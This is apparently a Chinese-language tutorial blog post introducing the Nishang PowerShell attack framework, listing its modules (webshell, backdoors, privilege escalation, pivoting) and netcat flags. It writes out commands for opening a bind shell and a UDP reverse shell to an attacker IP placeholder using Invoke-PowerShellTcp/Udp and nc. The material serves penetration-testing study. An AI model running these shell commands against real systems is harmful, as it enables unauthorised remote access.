当前位置: 首页 > 工具软件 > Nishang > 使用案例 >

基础篇:内网工具Nishang PowerShell

夔光霁
2023-12-01

目录

Nishang介绍

NiShang目录介绍

Nishang参数

NC参数

基于TCP协议的powershell交互式shell

Nishang介绍

Nishang是一个PowerShell攻击框架,它是Powershell攻击脚本和有效载荷的一个集合,Nishang被广泛应用于渗透测试的各个阶段

Nishang下载

NiShang目录介绍

        ActiveDirectory:活动目录

        Antak-Webshell:在内存中执行PowerShell脚本,运行命令,并使用此Webshell下载和上传文件

        Backdoors:一个后门,可以从第三方网站接收指令,并在内存中执行PowerShell脚本

        Bypass:实施公告已知方法来绕过

        Client:客户端

        Escalationl:当需要权限时提取

        Executionl:命令执行RCE

        Gatherl信息收集

        MITE:用于MITM攻击的本地HTTOS代理

        Misc:脚本

        Piovt:跳板

        Prasadhak:对照VirusTotal数据库检查正在进行的进程的运行哈希

        Scan:扫描

        Shells:shell

        Utility:杂项

        Powerpreter:Meterpreter会话

Nishang参数

        -IPAddress方向连接时需要连接到的IP地址

        -Port反向连接时是需要连接到的端口,选择-Bind选项时是需要监听端口

        -Reverse反向连接

        -Bind正向连接用到的端口监听

NC参数

        -n 直接使用ip地址,而不通过域名服务器

        -v 显示指令执行过程

        -l 使用监听模式 管控传入的资料 (适合反向连接)

        -p 设置本地主机使用的通信端口

基于TCP协议的powershell交互式shell

        Invoke-PowerShellTcp是PowerShell交互式正向或反向连接shell 

靶机执行:./Invoke-PowerShellTcp.ps1    Invoke-PowerShellTcp -Bind -Port 6666

        在攻击机上使用nc工具正向连接目标主机

攻击机:nc -nv <Inovke-Powershell开启交互式的靶机ip> 6666

基于UDP协议的交互式反弹shell     

靶机执行:./Invoke-PowerShellUdp -Reverse -IPAddress <攻击机的ip> -port 555

        在攻击机使用nc工具反向连接目标主机 

攻击机:nc -luvp 555

 类似资料: